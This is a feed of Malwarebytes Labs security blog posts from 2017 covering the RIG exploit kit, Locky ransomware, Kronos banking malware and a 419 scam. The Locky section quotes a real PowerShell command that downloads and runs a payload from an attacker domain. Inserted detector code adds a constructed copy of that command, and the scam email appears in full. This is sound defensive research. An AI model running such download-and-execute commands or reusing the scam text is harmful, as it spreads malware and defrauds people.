Lastly, Senior Security Researcher Jérôme Segura uncovered a new RIG exploit kit campaign that drops the PrincessLocker ransomware via drive-by download.

Mobile Menace Monday: Implications of Google Play Protect

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers
  • Scammers Already Taking Advantage Of Hurricane Harvey, Registering Domains. “The Better Business Bureau said it has already seen sketchy crowdfunding efforts and expects the coming months to see the usual flood of ‘storm chasers’ — ranging from legitimate contractors looking for business to scammers attempting to take advantage of those who’ve already been victimized by the storm. In addition, US-CERT is warning users “to remain vigilant for malicious cyber activity seeking to capitalize on interest in Hurricane Harvey.” (Source: Cyber in Sight)
  • IRS Warns of Emails Spreading Ransomware. “The Internal Revenue Service (IRS) is warning US citizens of a new phishing scheme that poses as official IRS communications in the hopes that victims access a link, download a file, and hopefully get infected with ransomware.” (Source: Bleeping Computer)
  • USB Malware Implicated in Fileless Attacks. “In early August we discussed a case where a backdoor was being installed filelessly onto a target system using a script that abused various legitimate functions. At the time, we did not know how the threat arrived onto the target machine. We speculated that it was either downloaded by users or dropped by other malware. We recently learned the exact arrival method of this backdoor. As it turned out, we were wrong: it was neither dropped nor downloaded. Instead, it arrived via USB flash disks.” (Source: Trend Micro’s TrendLabs Security Intelligence Blog)
  • FDA Approves Firmware Fix for St Jude Pacemakers. “Abbott-owned St Jude Medical was at the center of a legal storm last year after suing security firm MedSec and short seller Muddy Waters for publishing what it claimed to be false info about bugs in its equipment. It argued this strategy helped them make money off the stock market when shares in St Jude inevitably fell on the news. However, since then the firm has been forced to address some of the issues highlighted by MedSec by releasing security fixes for some products, as it did in January.” (Source: InfoSecurity Magazine)
  • Attackers Exploited Instagram API Bug To Access Users’ Contact Info. “Instagram has confirmed that ‘one or more individuals obtained unlawful access to a number of high-profile Instagram users’ contact information — specifically email address and phone number — by exploiting a bug in an Instagram API.’ Apparently, no account passwords were exposed.” (Source: Help Net Security)
  • Phishing Emails Undetected by 97 Percent of People. “Today, phishing emails are behind 97 percent of cyber attacks, yet recent research reveals 97 percent of people cannot identify those phishing scams, putting the companies they work for at risk. In fact, out of 5,000 emails, one of them is likely to be a phishing email that causes damage. Victims may not know they’ve become one for up to a year.” (Source: Inside Counsel)
  • New Authentication Methods Help Companies To Ditch Passwords. “Most people now recognize that passwords alone are flawed as a means of securing systems. The problem is that there are lots of options when it comes to finding a better way of doing things. Access control specialist SecureAuth is helping the move towards a passwordless world with the introduction of additional multi-factor authentication (MFA) methods, including Link-to-Accept via SMS or email, and YubiKey, the FIDO Universal Second-Factor (U2F) security key by Yubico.” (Source: Beta News)
Latest updates for Businesses
  • Strains Of Mutant Malware Increasingly Evading Anti-Virus To Rob Bank Accounts, Says Akouto. “An analysis of recent attacks finds a sharp increase in the use of new strains of malware capable of bypassing traditional anti-virus according to cybersecurity experts from Akouto. The majority of the analyzed attacks aimed to harvest confidential information and steal money through online banking fraud.” (Source: Payment Week)
  • Ransomware is Going More Corporate, Less Consumer. “Ransomware deployed as worms tends to hit companies far harder than consumers, given that malicious malware can shoot through corporate networks with great speed. Consumers, on the other hand, are usually not connected to a network. As a result, WannaCry and Petya helped push corporations to account for 42% of all ransomware incidents in the first half of the year, compared to 30% of ransomware incidents for all of last year and 29% in 2015, according to the report.” (Source: Dark Reading)
  • SMBs Beware! This Is How Automated Software Updates Spread Malware. “You’re surfing the web, and suddenly a pop-up appears asking you to update a piece of software on your computer. Today, we should all be canny enough to hesitate before clicking ‘install’. We know that there is a good chance that this is malware and that what we will be downloading could put the future of our business at risk. However, what happens when we’re not given a choice? Can we always trust the seemingly routine automatic updates our computers receive, even when their certificate seems to be OK? The answer is no.” (Source: Computing.Co.UK)
  • Hacking Retail Gift Cards Remains Scarily Easy. “After years of examining the retail gift card industry following that initial discovery, Caput plans to present his findings at the Toorcon hacker conference this weekend. They include all-too-simple tricks that hackers can use to determine gift card numbers and drain money from them, even before the legitimate holder of the card ever has a chance to use them. While some of those methods have been semi-public for years, and some retailers have fixed their security flaws, a disturbing fraction of targets remain wide open to gift card hacking schemes, Caput says. And as analysis of the recently defunct dark web marketplace AlphaBay shows, actual criminals have made prolific use of those schemes too.” (Source: Wired)
  • Payment security: What are the biggest challenges? “With cybercrime on the increase, payment card security is increasingly a focus for companies and consumers alike. The Payment Card Industry Data Security Standard (PCI DSS) is there to help businesses that take card payments protect their payment systems from breaches and theft of cardholder data. The findings from the Verizon 2017 Payment Security Report (2017 PSR) demonstrate a link between organizations being compliant with the standard, and their ability to defend themselves against cyberattacks.” (Source: Help Net Security)

Safe surfing, everyone!

 

The Malwarebytes Labs Team

The post A week in security (August 28 – September 3) appeared first on Malwarebytes Labs.


Insider threats in your work inbox

Malwarebytes - Fri, 09/01/2017 - 16:52

Recently, our friends at Barracuda found a new phishing campaign that banks on the popularity of cloud services used in most businesses, such as Microsoft Office 365.

According to their blog post, this latest scheme takes advantage of the natural trust employees place on messages they receive from colleagues using the correct email address. Dear reader, this campaign is beyond impostor email or business email compromise (BEC). Barracuda is calling it the ‘new insider threat.’

BEC phishing campaigns usually originate outside the target organization. The threat actor creates an email address that may appear like the real thing, just like what we’ve seen here, and then uses it to convince someone in the organization to wire money their way. If a threat actor successfully infiltrates an organization’s email platform on the cloud, then the threat becomes something else. The threat actor has become an identity thief and an insider who is now the biggest threat to any organization. At that point, the possibilities of abuse are endless.

Businesses can combat this new attack by continuous education and awareness efforts. It also pays to add multifactor authentication for additional ways employees can verify their identities before being allowed to access their work emails.

 

The Malwarebytes Labs Team

The post Insider threats in your work inbox appeared first on Malwarebytes Labs.


RIG exploit kit distributes Princess ransomware

Malwarebytes - Thu, 08/31/2017 - 20:04

We have identified a new drive-by download campaign that distributes the Princess ransomware (AKA PrincessLocker), leveraging compromised websites and the RIG exploit kit. This is somewhat of a change for those tracking malvertising campaigns and their payloads.

We had analyzed the PrincessLocker ransomware last November and pointed out that despite similarities with Cerber’s onion page, the actual code was much different. A new payment page seemed to have been seen in underground forums and is now being used with attacks in the wild.

From hacked site to RIG EK

We are not so accustomed to witnessing compromised websites pushing exploit kits these days. Indeed, some campaigns have been replaced with tech support scams instead and overall most drive-by activity comes from legitimate publishers and malvertising.

Yet, here we observed an iframe injection which redirected from the hacked site to a temporary gate distinct from the well-known “Seamless gate” which has been dropping copious amounts of the Ramnit Trojan.

The ultimate call to the RIG exploit kit landing page is done via a standard 302 redirect leading to one of several Internet Explorer (CVE-2013-2551, CVE-2014-6332, CVE-2015-2419, CVE-2016-0189) or Flash Player (CVE-2015-8651) vulnerabilities.

Princess ransomware

Once the exploitation phase is successful, RIG downloads and runs the Princess Ransomware. The infected user will notice that their files are encrypted and display a new extension. The ransom note is called _USE_TO_REPAIR_[a-zA-Z0-9].html where [a-zA-Z0-9] is a random identifier.

The payment page can be accessed via several provided links including a ‘.onion‘ one. Attackers are asking for 0.0770 BTC, which is about $367 at the time of writing.

Down but still kicking

The exploit kit landscape is not what it was a year ago, but we may be remiss to disregard drive-by download attacks completely. Malvertising is still thriving and we are noticing increased activity and changes with existing threat actors and newcomers.

We will update this post with additional information about Princess Locker if there is anything noteworthy to add.

Indicators of compromise

RIG EK gate:

185.198.164.152

RIG EK IP address:

188.225.84.28

PrincessLocker binary:

c61f4c072bb1e3c6281a9799c1a3902f35dba652756fe96a97e60d0097a3f9b7

PrincessLocker payment page:

royall6qpvndxlsj[.]onion

The post RIG exploit kit distributes Princess ransomware appeared first on Malwarebytes Labs.


Locky ransomware adds anti sandbox feature (updated)

Malwarebytes - Thu, 08/31/2017 - 16:09

By Marcelo Rivero and Jérôme Segura

The Locky ransomware has been very active since its return, which we documented in a previous blog post. There are several different Locky campaigns going on at the same time, the largest being the one from affiliate ID 3, which comes with a malicious ZIP containing .VBS or .JS attachments.

Malwarebytes researcher Marcelo Rivero discovered a trick documented before with the Dridex Trojan [1] employed by Locky’s affiliate ID 5 to bypass automated analysis done via sandboxes.

Malware authors have used booby trapped Office documents containing macros to retrieve their payloads for some time, but ordinarily, the code executes as soon as the user clicks the ‘Enable Content’ button. For analysis purposes, many sandboxes lower the security settings of various applications and enable macros by default, which allows for the automated capture of the malicious payload.

Strikes when you least expect it

However, this particular Locky campaign no longer simply triggers by running the macro itself but waits until the fake Word document is closed by the user before it starts to invoke a set of commands.

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile(‘http://newhostrcm[.]top/admin.php?f=1’, $env:APPDATA + ‘\sATTfJY.exe’); Start-Process $env:APPDATA’\sATTfJY.exe’;

The payload is downloaded and launched from the %appdata% folder followed by the typical ransom note:

Implications

While not a sophisticated technique, it nonetheless illustrates the constant cat and mouse battle between attackers and defenders. We ascertain that in their current form, the malicious documents are likely to exhibit a harmless behavior in many sandboxes while still infecting end users that would logically close the file when they realize there is nothing to be seen.
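A check on process-creation telemetry does not depend on when the macro fires, so it still sees the PowerShell command shown above when it is launched on document close. This is an added example, not code from the original post or from Malwarebytes: the event fields, the scoring and the sample events are assumptions, and the sample values are constructed.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Command lines copied from reports often carry typographic quotes.
QUOTES = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'})

CHECKS = {
    "no_profile": re.compile(r"(?<![\w-])-nop\w*", re.I),
    "policy_bypass": re.compile(r"(?<![\w-])-e(?:p|x\w*)\s+bypass\b", re.I),
    "download_file": re.compile(r"\.DownloadFile\s*\(", re.I),
    "start_process": re.compile(r"\bStart-Process\b", re.I),
    "appdata_exe": re.compile(r"\$env:APPDATA[^;]*?\.exe", re.I),
}
URL = re.compile(r"https?://[^\s'\")]+", re.I)


def assess(event):
    """Score one process-creation event (hypothetical field names)."""
    parent = basename(event["parent_image"]).lower()
    child = basename(event["image"]).lower()
    cmd = event["command_line"].translate(QUOTES)
    signals = sorted(name for name, rx in CHECKS.items() if rx.search(cmd))
    office_child = parent in OFFICE_PARENTS and child in SHELLS
    download_and_run = {"download_file", "start_process"} <= set(signals)
    if office_child and download_and_run:
        verdict = "alert"      # Office app spawned a download-and-execute shell
    elif office_child or download_and_run:
        verdict = "review"     # one half of the pattern only
    else:
        verdict = "ok"
    return {"verdict": verdict, "signals": signals, "urls": URL.findall(cmd)}


# Constructed sample events; domain and file name are placeholders.
EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                     r'-nop -Exec Bypass -Command (New-Object System.Net.WebClient)'
                     r'.DownloadFile(‘http://download.example/admin.php?f=1’, '
                     r'$env:APPDATA + ‘\sample.exe’); '
                     r'Start-Process $env:APPDATA’\sample.exe’;'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "command_line": r"C:\Windows\splwow64.exe 8192"},
    {"parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-Date"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(assess(ev))
```
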

Malwarebytes blocks this ‘closing the document’ trick:

Overall we can mitigate this threat at different layers:


Indicators of compromise:

Word documents:

b613b1c80b27fb21cfc95fb9cd59b4bb64c9fda0651d5ca05b0b50f76b04c9f4
8ca111f79892cb445c44588f1ade817abcbb3f3e39971f0ef7891b90f09de1e9
23d51440e2325808add6a1e338c697adc10fc0fa6d2ae804cc94af3e725c34cf

Locky:

newhostrcm[.]top/admin.php?f=1
doctorfeelk[.]top/admin.php?f=1
47.89.250.152
7cdcb878bf9bf5bb48a0034b04969c74401b25a516078ffd7f721d8098b2a774
933bd8262a34770b06ebe64c800f98d68082c2929af69c3feae7dd4c2aa6a897

References

[1] https://www.proofpoint.com/us/threat-insight/post/Run-on-Close-Macros-Try-to-Shut-the-Door-on-Sandboxes

The post Locky ransomware adds anti sandbox feature (updated) appeared first on Malwarebytes Labs.


BSides Manchester: Malvertising – under the hood

Malwarebytes - Thu, 08/31/2017 - 15:00

I’ve talked about malvertising a fair bit at security events down the years and I was lucky enough to be able to add to the tally at this month’s BSides Manchester conference. Whether your preferred variety is desktop, mobile, or even virtual/augmented reality, there’s hopefully something here for everyone.

“Malvertising: under the hood” covers the following topics:

  • Malvertising definition
  • Publisher/advertiser numbers
  • From old ads to new
  • Fake advertisers and domain shadowing
  • Domain imitation
  • Cloned ads
  • Malvertising gateways
  • Bad ad excuses
  • Ad blocking wars
  • Mobile antics
  • VR / AR

Chris Boyd

The post BSides Manchester: Malvertising – under the hood appeared first on Malwarebytes Labs.


Malware vaccination tricks: blue pills or red pills

Malwarebytes - Wed, 08/30/2017 - 18:00

First, let me explain what I mean by malware vaccination tricks. Most of you will have heard about some of these. Vaccination tricks are in fact techniques that use safety checks done by malware against that same malware. The malware checks for the presence of certain files or registry keys as a sign that the machine should not be infected. And users make sure those keys or files are present as a security measure.

Examples of safety checks
  • A lot of malware contains routines to check whether it is running on a Virtual Machine (VM), sandbox or with a debugger. They do this to avoid being detected by many of the automated systems the AV industry uses to deal with the large numbers of malware that surface every second of the day.
  • Some malware check the default language installed on the affected system or the keyboard language. They do this because they shy away from infecting systems in certain countries, or quite the opposite because they target certain countries.
  • Certain types of malware check whether they have already infected a certain machine by creating a certain registry key or dropping a certain file. They do this to avoid problems, conflicts, and monitoring. Especially certain families of ransomware are known to do this.
  • Online checks are another form of testing whether a machine could be run by analysts. The most famous example must be WannaCry.
  • Canary file checks are another type of check, mostly done by ransomware. In these cases, the canary files are files that trigger an alarm as soon as they are being changed. They are designed to alert users that there might be an active ransomware infection, which is encrypting files.
  • Software checks are done to avoid infecting machines that might be recording, debugging, or sending telemetry. Some exploit kits, for example, do not infect machines that are running Malwarebytes to avoid showing up in our telemetry. Other popular software they avoid is Wireshark, which is often used by analysts to capture network traffic.
So how could we use this knowledge?

Red pills
  • Installing security software like Malwarebytes and others is obviously a good idea because it not only scares away some malware, but it is foremost an excellent security software.
  • If you can live with the lowered specs that are a result of using virtual machines and sandboxes, this is another good idea to enhance your security. If you use your VM right you can go back to a recent image in case of an emergency. And sandboxes can keep accidents contained within a limited environment.
Blue pills
  • Changing your default language is an option that I would not recommend for people that are not fluent in the language they are installing. From personal past experiences, using different languages side by side on a Windows system can cause Babylonian language confusions on your system.
  • Adding certain registry keys if you are afraid of a particular infection doesn’t hurt your system much, but they are no guarantee for permanent vaccination. If we all start adding HKEY_CURRENT_USER\Software\Locky to our registry, the malware authors will soon design another check and none of us would be protected anymore after they changed it.
  • Adding a keyboard layout that you never plan on using is a rather harmless method, unless you have a tendency to hit two adjoining keys on a regular basis (Ctrl+Shift changes the keyboard layout to the next option you have installed). Besides that, most malware uses more refined methods to check where you are from.
Impossipills

Some knowledge is good to have and we would like to thank all the researchers for sharing what they found. But the methods that some vaccines require are of no real use unless you are especially afraid of one certain type of malware. There are so many ways for malware to check whether it is running on a VM that it is almost impossible to “fake” all of them, so you would have to know which type of check the malware you are most afraid of is using. IMHO the same is true for putting all kinds of files on your system that will supposedly stop ransomware from encrypting your files. Some of these vaccines are so much work they would require automation IMHO, like putting a malformed image in every directory holding files which you don’t want to be encrypted by Cerber.

Conclusion

Sometimes vaccines against certain malware are offered by researchers that point out a method you can use to protect against a particular form or variant of malware. We are not saying that these methods do not work, but we would like to point out that applying all these vaccines can easily turn into a full-time job and you still wouldn’t be protected adequately. It is better to make sure your systems are really protected and easily restored than to clutch at every little straw you are offered.

Hint for those that didn’t get the pills reference: “What would Neo do?”

Take care out there and safe surfing.

Pieter Arntz

The post Malware vaccination tricks: blue pills or red pills appeared first on Malwarebytes Labs.


419 spam: 10 million US dollars, courtesy of “Rev. Goodluck Ebola”

Malwarebytes - Tue, 08/29/2017 - 17:10

I’m not saying an email claiming to be from the “Central Bank of Nigeria” with a contact handler named “Rev. Goodluck Ebola” will raise too many red flags, but…


CENTRAL BANK OF NIGERIA
OFFICE OF THE GOVERNOR
Zaria Street, Off Samuel Akintola
Street,Garki 11, Garki-Abuja.

Our Ref: FGN/CBN/NIG/01/2017.

Your Ref………………………….

From The Desk Of Mr. Godwin Emefiele.
Governor, Central Bank of Nigeria (CBN)

SUBJECT: Dear Valued Customer.

Dear Friend,

We wish to inform you that your unclaimed payment of USD$10.5 Million in Africa has been released and ready to be paid to you via PREPAID VISA CARD which you will use to withdraw the US$10.5 Million from any ATM Machine in any part of the world.

We have mandated UBA financial advicers Ghana, to send you the ATM CARD and PIN NUMBER which you will use to withdraw all your US$10.5Million Dollars in any ATM SERVICE MACHINE in any part of the world, but the maximum you can withdraw in a day is US$20,000.00 Only.

You are therefore advice to contact the Head of ATM CARD Department of UBA financial advicers Ghana;

Contact Person: Rev. Goodluck Ebola,
Office email address: [snip]@gmail.com

Tell Rev. Goodluck Ebola, that you received a message from the CENTRAL BANK OF NIGERIA. Instructing him to send you the ATM CARD and PIN NUMBER which you will use to withdraw your USD$10.5 Million Dollars in any ATM SERVICE MACHINE in any part of the world, also send him your direct phone number and contact address where you want him to send the ATM CARD and PIN NUMBER to you.

We are very sorry for the plight you have gone through in the past years.

Thanks for adhering to this instruction and once again accept our congratulations.

Best Regards.

Mr. Godwin Emefiele.
Executive Governor,
Central Bank of Nigeria (CBN).

…I think I just hand stitched fifteen thousand red flags and hung them up around a printout of this email. That this comes from an entirely unrelated .jp (Japan) email address is the icing on the scam sandwich cake. This is indeed a 419 attempt and all that likely waits for you at the other end is:

  • All your money stolen
  • Your bank account used in a money mule scam
  • The sweet embrace of jailtime

Your career as a money mule may also be short lived, assuming the police don’t get you first.

What’s particularly curious here is we’ve primarily seen this one bouncing around via “Rev. Goodluck Egobia” instead of “Ebola”, so we’re not sure if this is an error, a joke, or someone at the spam factory just got bored. Either way, you should avoid replying to any emails similar to the above as it’s 100% guaranteed to be fake.

 

Chris Boyd

The post 419 spam: 10 million US dollars, courtesy of “Rev. Goodluck Ebola” appeared first on Malwarebytes Labs.


Inside the Kronos malware – part 2

Malwarebytes - Tue, 08/29/2017 - 15:00

In the previous part of the Kronos analysis, we took a look at the installation process of Kronos and explained the technical details of the tricks that Kronos uses in order to remain more stealthy. Now we will move on to look at the malicious actions that Kronos can perform.

Analyzed samples

Special thanks to @shotgunner101 and @chrisdoman for sharing the samples.

Configuration and targets

Kronos is known as a banking Trojan. To enable and configure this feature, the bot may download an additional configuration file from its CnC. After being fetched, it is stored in the installation folder in encrypted form. (It is worth noting that when the config is sent over the network it is encrypted using AES in CBC mode, but when it is stored on the disk, AES in ECB mode is used.)

Below you can see an example of the installation folder of Kronos, created in %APPDATA%/Microsoft. The folder name is further used as a BotId. Both stored files, the executable and the configuration, have the same name and differ only by the extension:

Here you can see the captured configuration file in a decrypted form:

https://gist.github.com/malwarezone/d6de3d53395849123596f5d9e68fe3a3#file-config-txt

The format of the configuration follows the standard defined by the famous Zeus malware.

The config specifies the external script that is going to be injected in the targeted website, as well as the place of the injection. Below you can see a fragment of the configuration for a sample target – Wells Fargo Bank:

In the given example, the injected script is figrabber.js

It is hosted on the server of the attacker:

The current configuration targets several banks, but also steals credentials for popular services like Google, Twitter, and Facebook.

Indeed, if we open the websites that are targeted by the malware, we can see that the injects have been performed. The fragments of code that were defined in the config are implanted in the source of a legitimate website. Some examples are included below:

Facebook:

Citibank:

The injected scripts are responsible for opening an additional pop-up that tries to phish the user and steal his/her personal data:

Wells Fargo:

More cases, and their comparison with normal site behavior before the infection, are demonstrated in the video:

The form is customized to fit the theme of each page. However, its content is the same for each target. Overall, the attack is not very sophisticated and it will probably look suspicious to the more advanced users. It’s based purely on social engineering – trying to convince a user to input all personal data that are necessary for banking operations:

Downloader

Apart from infecting browsers and stealing the data, Kronos also has a downloader feature. During our tests, it downloaded a new executable and saved it in %TEMP%. Payloads are stored in an additional directory with the same name as the main installation directory:

Downloaded payload:

6f7f79dd2a2bf58ba08d03c64ead5ced – nCBngA.exe

The payload is downloaded from Kronos CnC:

…in unencrypted form:

In the analyzed case, the downloaded payload was just an update of the Kronos bot. However, the same feature may also be used for fetching and deploying other malware families.

Command and Control (CnC) server

In the analyzed case, Kronos used the Fast-Flux technique for its CnC. The domain was resolved to a different IP each time. For example, the domain hjbkjbhkjhbkjhl.info was resolved to an IP address randomly picked from the pool given below:

46.175.146.50 46.172.209.210 47.188.161.114 74.109.250.65 77.122.51.88 77.122.51.88 89.25.31.94 89.185.15.235 91.196.93.112 176.32.5.207 188.25.234.208 109.121.227.191

Watching the communication with the CnC, we observed queries to the site connect.php, with an optional parameter a:

connect.php - initial beacon
connect.php?a=0 - sending data to the CnC
connect.php?a=1 - downloading the configuration from the CnC

CnC panel

Thanks to the code of the CnC panel that leaked online, we can gain more insight into all the functionalities and their implementation. Like most malware panels, the Kronos panel is written in PHP and uses a MySQL database. Overview of the files:

It turns out, that in total the bot has three commands:

  • a=0 – send the grabbed page content
  • a=1 – fetch the configuration file
  • a=2 – send the logged windows

Below we can see the relevant fragments of the panel’s code (implemented inside connect.php), responsible for parsing and storing the data uploaded by the respective commands.

Command #0 (a=0):

Command #2 (a=2):

The configuration that is sent to the bot is prepared by the following code:

Command #1 (a=1):

We can also see very clearly how the config is encrypted – using AES in CBC mode, where the key is the first 16 bytes of md5 of the BotId (this confirms what researchers from Lexsi lab found by reverse engineering).

However, AES is not the only cryptographic algorithm that is utilized by Kronos. Other commands use BlowFish in ECB mode:

Command #0 (a=0):

Command #2 (a=2):

In all cases, there is a variable called UniqueId that is used as a key. The UniqueId is nothing more than the BotId, which is sent in every POST request in XOR-encoded form.

You can find the corresponding Python scripts for decoding the appropriate requests and responses here:

https://github.com/hasherezade/malware_analysis/tree/master/kronos

Kronos also comes with the option of adding plugins that extend the core functionality:

As we may conclude, the plugins are capable of extending Kronos with some espionage capabilities, such as VNC (for viewing the desktop) and logging typed keystrokes.

Decrypting the communication

With the help of prepared scripts (available here), we can decrypt the important elements of the communication between the Kronos bot and the CnC server. Let’s assume that we have a PCAP file with captured traffic.

The BotId

We need to start by getting the Kronos BotId because, as we know, it will be used to derive the encryption keys. We will find it in the requests sent by the bot to its CnC (74 bytes long):

After dumping the request, we can use the following script to decode it:

./kronos_beacon_decoder.py --infile dump1.bin

As the output we will get the decoded beacon, consisting of:

  1. Hash of the configuration file (if no configuration file was present at the moment, this part will be filled with “X” characters)
  2. The BotId

Example:

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX{117BB161-6479-4624-858B-4D2CE81593A2}

So, in the demonstrated case the BotId is {117BB161-6479-4624-858B-4D2CE81593A2}.
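The connect.php commands and the decoded beacon layout described above are enough to triage proxy logs before any decryption. The following is an added example, not one of the author's scripts: the log format, the verdict rule and the function names are assumptions, the log lines are constructed, and the 74-byte figure is treated as the size of the beacon request body.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Values of the "a" parameter as listed in the post
COMMANDS = {"0": "report-grabbed-page", "1": "config-download",
            "2": "report-logged-windows"}
BEACON_BODY_LEN = 74  # from the post; assumed to be the request body size
GUID = r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}"
DECODED_BEACON = re.compile(r"^(.*)(" + GUID + r")$", re.S)


def parse_decoded_beacon(text):
    """Split an already decoded beacon into config hash and BotId."""
    m = DECODED_BEACON.match(text.strip())
    if not m:
        return None
    field, bot_id = m.groups()
    # A field made only of "X" means the bot has no configuration yet.
    has_config = bool(field) and set(field) != {"X"}
    return {"bot_id": bot_id, "config_hash": field if has_config else None}


def classify(method, url):
    """Map one request to a Kronos command name, or None if it does not fit."""
    parts = urlsplit(url)
    if method.upper() != "POST" or not parts.path.lower().endswith("/connect.php"):
        return None
    if not parts.query:
        return "beacon"
    return COMMANDS.get(parse_qs(parts.query).get("a", [""])[0])


def triage(log_lines):
    """Group matching requests per (client, host) and grade the evidence."""
    seen = defaultdict(lambda: {"commands": set(), "beacon_len_match": False})
    for line in log_lines:
        fields = line.split()
        if len(fields) != 6 or not fields[5].isdigit():
            continue
        _ts, client, method, url, _status, req_bytes = fields
        kind = classify(method, url)
        if kind is None:
            continue
        entry = seen[(client, urlsplit(url).hostname)]
        entry["commands"].add(kind)
        if kind == "beacon" and int(req_bytes) == BEACON_BODY_LEN:
            entry["beacon_len_match"] = True
    report = {}
    for key, entry in seen.items():
        # connect.php is a common file name, so one hit alone proves little:
        # require the 74-byte beacon plus at least one a= command.
        strong = entry["beacon_len_match"] and entry["commands"] - {"beacon"}
        report[key] = {"commands": sorted(entry["commands"]),
                       "verdict": "likely-kronos" if strong else "low-confidence"}
    return report


# Constructed log: timestamp client method url status request_bytes
SAMPLE_LOG = [
    "2017-08-29T10:00:01Z 10.0.0.5 POST http://cnc.example/connect.php 200 74",
    "2017-08-29T10:00:02Z 10.0.0.5 POST http://cnc.example/connect.php?a=1 200 74",
    "2017-08-29T10:05:10Z 10.0.0.5 POST http://cnc.example/connect.php?a=0 200 1832",
    "2017-08-29T10:06:00Z 10.0.0.9 POST http://intranet.example/app/connect.php 200 512",
    "2017-08-29T10:07:00Z 10.0.0.9 GET http://intranet.example/index.php?a=1 200 0",
]

if __name__ == "__main__":
    for key, result in triage(SAMPLE_LOG).items():
        print(key, result)
    print(parse_decoded_beacon("X" * 32 + "{117BB161-6479-4624-858B-4D2CE81593A2}"))
```
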

The configuration

Having the BotId, we can move to decrypt the configuration. It arrives in the response to the a=1 request:

Example of the request followed by the encrypted response from the CnC:

After dumping the response, we can use another script to decode it, giving the BotId as a parameter:

./kronos_a1_decoder.py --datafile dump2.bin --botid {117BB161-6479-4624-858B-4D2CE81593A2}

As a result, we will get the configuration file. Example of the decoded config:
https://gist.github.com/malwarezone/a7fc13d4142da0c6a67b5e575156c720#file-config-txt

The sent reports

Sometimes we can find the Kronos bot reporting to the CnC in requests a=0 or a=2:

Example of the encrypted request:

Finding out exactly what data Kronos stole is not difficult if we dump the data and use the dedicated script:

./kronos_a02_decoder.py --datafile dump3.bin --botid {117BB161-6479-4624-858B-4D2CE81593A2}

Example of the decoded report:
https://gist.github.com/malwarezone/a03fa49de475dfbdb7c499ff2bbb3314#file-a0_req-txt

Conclusion

In terms of code quality, Kronos is written in a decent way; however, its features are nothing novel. Although the bot got good reviews on underground forums, in terms of popularity it was always lagging behind. Its relatively high price was probably an important factor in why it lost out to its competitors.

Appendix

See also:

Inside the Kronos malware – part 1

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going into detail about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.

The post Inside the Kronos malware – part 2 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (August 21 – August 27)

Malwarebytes - Mon, 08/28/2017 - 17:38

In our blog posts, we announced the introduction of, and explained the necessity for, real-time protection for our Mac and Android users. We also explained what you can expect it to do for you and answered the questions that we expect to be frequently asked.

We looked at 4 key steps you can take within your business to help gain trust with your employees while educating them to make more secure decisions. And in our “Explained” series we talked about user agent strings and digital forensics.

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers

Latest updates for Businesses

Safe surfing, everyone!

The Malwarebytes Labs Team

The post A week in security (August 21 – August 27) appeared first on Malwarebytes Labs.

Mobile Menace Monday: Implications of Google Play Protect

Malwarebytes - Mon, 08/28/2017 - 17:00

Along with the recent release of Google’s new OS, Android 8.0 Oreo, they also released a new security suite known as Google Play Protect. As blogged about in July in Play Protect: Android’s new security system is now available, this new suite has been available since mid-May.

To reiterate

As noted in our July blog, the new Find My Phone does exactly what the name implies. You can also lock the phone remotely, display a message on the phone, call the phone through a browser, or even erase all the data on the phone with this feature. I personally hope this will help alleviate the use of shady monitoring apps. There is also Google’s Safe Browsing that stops you before you proceed to an unsafe site via Chrome. This feature has been around for a while.

50 billion apps, oh my!

Of most interest in Google’s security suite are its new scanning capabilities. Google boasts it can scan 50 billion apps daily, and uses machine learning to weed out the bad stuff. For quite some time, Google has been vetting apps before allowing them in the Google Play Store. Until now, they had no way to verify that the apps stayed vetted after install. This new capability allows Google to scan apps after installation, as well. Not only does it scan apps installed from Google Play, but it also scans apps installed from third-party sites.

The ability to scan apps after install will aid in detecting apps that are set to hide their malicious activity for a set amount of time or after an update — i.e., a malicious app may wait a week before doing anything malicious to hide its presence from malware researchers and scanners. Google claims that if an app that was once acting safely is suddenly doing something malicious, it will flag it.

This machine learning you talk about…

The use of machine learning to detect malware is far from a new concept. Regarding malware detection, it typically works by pooling things into two groups — a good group and a bad group. It then learns every trait it can about each group. If anything looks out of the ordinary from the good group and/or displays traits from the bad group, it’s flagged.

I can only assume Google is using anything on Google Play, that per Google “undergo rigorous security testing,” to pool in the good group. If the trait of the app changes from when it was verified to get into Google Play — bam, it’s flagged!

Grey is the new black

This all sounds great, but malware authors are already ahead of the curve. We have seen the rise of apps that lie in the “gray” area, better known as Potentially Unwanted Programs (PUPs). Rather than making obviously malicious (black) apps, malware authors are creating apps that are rather questionable.

